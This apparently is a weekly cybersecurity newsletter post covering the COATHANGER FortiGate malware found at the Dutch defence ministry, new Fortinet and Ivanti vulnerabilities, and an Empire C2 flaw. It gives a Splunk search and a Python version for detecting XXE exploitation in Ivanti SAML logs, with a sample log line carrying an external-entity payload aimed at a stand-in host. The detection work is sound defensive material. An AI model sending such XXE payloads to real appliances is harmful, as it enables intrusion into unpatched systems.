CCTR.7.FEB.24
Chinese Threat Actors, Fortinet and Ivanti bug bash, Rooting the Empire
Last updated
Monday morning Cyber coffee read CCTR.7.FEB.24.
The Ministry of Defence (MOD) of the Netherlands was impacted in 2023 by a Chinese state-sponsored threat group. The incident does not stand on its own: it is part of a wider trend of Chinese political espionage against the Five Eyes and their allies. Incident response uncovered previously unpublished malware, COATHANGER, specifically designed for FortiGate appliances. Although this incident started with the abuse of CVE-2022-42475 (a FortiGate vulnerability), COATHANGER could conceivably be used in combination with any present or future software vulnerability in FortiGate devices. The malware is persistent: it survives reboots and firmware upgrades.
Ref https://www.ncsc.nl/documenten/publicaties/2024/februari/6/mivd-aivd-advisory-coathanger-tlp-clear
Hang in there! Fortinet has disclosed two more critical vulnerabilities, CVE-2024-21762 (CVSS 9.6) and CVE-2024-23113 (CVSS 9.8), both allowing remote code execution.
If you haven't patched yet, it might be a good idea to look for exploitation attempts in your Pulse (Ivanti Connect Secure) logs with a scheduled search such as:
`my_pulse_logs` message="*SAML AuthnRequest received *!DOCTYPE root [<!ENTITY %* \"http*" | rex field=message "\!DOCTYPE\sroot\s\[\<\!ENTITY\s\%.+?(?=\"http)\"(?<url>.+?(?=\"))"
Ref https://twitter.com/mthcht/status/1756500390667862083?s=46&t=HCEpLrULiOJC6LulFCCopw
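As an added example (not from the tweet or the original post), the same wildcard filter and field extraction as the SPL above, reimplemented in Python over constructed log lines so the logic can be tested offline before it is scheduled; the log format and the domain in the sample lines are made up.

```python
import re

# Constructed sample Pulse / Ivanti Connect Secure log messages (not real data).
SAMPLE_LOGS = [
    # Benign SAML request: no DOCTYPE, must not be flagged.
    'info - [10.0.0.5] SAML AuthnRequest received from SP "https://sp.example.org/saml"',
    # What the page's search is looking for: an external parameter entity in the DOCTYPE.
    'info - [198.51.100.7] SAML AuthnRequest received <?xml version="1.0"?>'
    '<!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://dtd.example.invalid/x.dtd">%dtd;]>'
    '<samlp:AuthnRequest ...',
    # DOCTYPE present but no "http URL: the original search does not match this either.
    'info - [203.0.113.9] SAML AuthnRequest received <!DOCTYPE root [<!ENTITY % a "b">]>',
    # Unrelated message.
    'info - [10.0.0.5] Login succeeded for user/realm',
]

# The message="..." filter from the SPL, with the SPL quote-escaping (\") removed.
SPL_WILDCARD = '*SAML AuthnRequest received *!DOCTYPE root [<!ENTITY %* "http*'

# The rex from the SPL, likewise unescaped; Python uses (?P<name>...) for named groups.
URL_RE = re.compile(r'!DOCTYPE\sroot\s\[<!ENTITY\s%.+?(?="http)"(?P<url>.+?(?="))')


def wildcard_to_regex(pattern: str) -> re.Pattern:
    """Translate a Splunk wildcard string: * matches any run of characters,
    everything else (including the literal '[') is matched verbatim."""
    return re.compile(".*".join(re.escape(part) for part in pattern.split("*")), re.DOTALL)


def extract_xxe_urls(messages):
    """Return (message, url) for every message the scheduled search would flag.

    url is the external entity location the rex extracts (None if the message
    passed the wildcard filter but the rex found nothing, which the SPL also allows)."""
    filt = wildcard_to_regex(SPL_WILDCARD)
    hits = []
    for msg in messages:
        if not filt.fullmatch(msg):
            continue
        m = URL_RE.search(msg)
        hits.append((msg, m.group("url") if m else None))
    return hits


if __name__ == "__main__":
    for msg, url in extract_xxe_urls(SAMPLE_LOGS):
        print(f"flagged: url={url}\n  {msg[:90]}...")
```

The extracted url field is the value worth alerting on and recording as an indicator; a benign AuthnRequest carries no DOCTYPE at all, so any hit deserves a look.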
A vulnerability in the Empire C2 framework prior to version 5.9.3 leads to remote code execution as root on the C2 Server. If you're using Empire in your penetration testing and red team activities, consider updating.
Ivanti is also giving Fortinet a run for its money, but this time it disclosed only one new high-risk authentication bypass vulnerability, CVE-2024-22024 (CVSS 8.8). It allows threat actors to gain access to restricted resources on unpatched appliances without the need for authentication.